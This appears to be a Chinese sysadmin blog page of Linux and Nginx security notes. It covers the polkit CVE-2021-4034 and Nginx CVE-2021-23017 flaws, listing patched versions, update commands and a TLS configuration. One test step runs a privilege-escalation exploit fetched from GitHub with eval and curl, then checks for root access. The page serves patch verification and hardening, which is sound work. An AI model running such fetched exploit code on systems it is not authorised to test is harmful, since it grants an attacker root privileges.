系统安全
//
# 安全
# Linux polkit本地权限提升漏洞(CVE-2021-4034)
github POC 地址 (opens new window)
- centos 普通用户测试
useradd test
su - test
eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)"
ls /root
1
2
3
4
2
3
4
修复的版本
CentOS系列: CentOS 6:polkit-0.96-11.el6_10.2 CentOS 7:polkit-0.112-26.el7_9.1 CentOS 8.0:polkit-0.115-13.el8_5.1 CentOS 8.2:polkit-0.115-11.el8_2.2 CentOS 8.4:polkit-0.115-11.el8_4.2 Ubuntu系列: Ubuntu 21.10:policykit-1-0.105-31ubuntu0.1 Ubuntu 20.04 LTS:policykit-1 - 0.105-26ubuntu1.2 Ubuntu 18.04 LTS:policykit-1 - 0.105-20ubuntu0.18.04.6 Ubuntu 16.04 ESM:policykit-1 - 0.105-14.1ubuntu0.5+esm1 Ubuntu 14.04 ESM:policykit-1 - 0.105-4ubuntu3.14.04.6+esm1 Debain系列: Debain stretch:policykit-1 0.105-18+deb9u2 Debain buster:policykit-1 0.105-25+deb10u1 Debain bullseye:policykit-1 0.105-31+deb11u1 Debain bookworm,bullseye:policykit-1 0.105-31.1 麒麟v10 漏洞修复版本:0.116-6.ky10 # devel,help,libs 总共四个包
# 修复
- CentOS:
yum clean all && yum makecache #需要配置base源
yum update polkit -y
1
2
2
wget https://download.yfklife.cn/blog/ops/security/polkit-0.112-26.el7_9.1.x86_64.rpm
- Ubuntu:
sudo apt-get update #需要配置base源
sudo apt-get install policykit-1
1
2
2
# Nginx DNS解析漏洞(CVE-2021-23017)
将 Nginx 升级到 1.20.1 及以上版本
把对应的包替换为 1.20.1
# 证书加密码
- ssh-keygen
ssh-keygen -p -f xxx.key
nginx加载的时候要输入刚刚设置的密码
- nginx安全协议TLS
listen 443 ssl;
client_max_body_size 0;
proxy_max_temp_file_size 0;
ssl_certificate ssl/yfklife.cn.crt;
ssl_certificate_key ssl/yfklife.cn.key;
ssl_session_timeout 10m;
ssl_protocols TLSv1.2;
ssl_prefer_server_ciphers on;
ssl_session_cache shared:SSL:10m;
ssl_ciphers '!aNULL:!MD5:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-WITH-AES128-GCM-SHA256';
1
2
3
4
5
6
7
8
9
10
2
3
4
5
6
7
8
9
10
//
如果此文章对您有帮助,点击 -->> 请博主喝咖啡 (opens new window)
上次更新: 2024/09/27, 18:00:01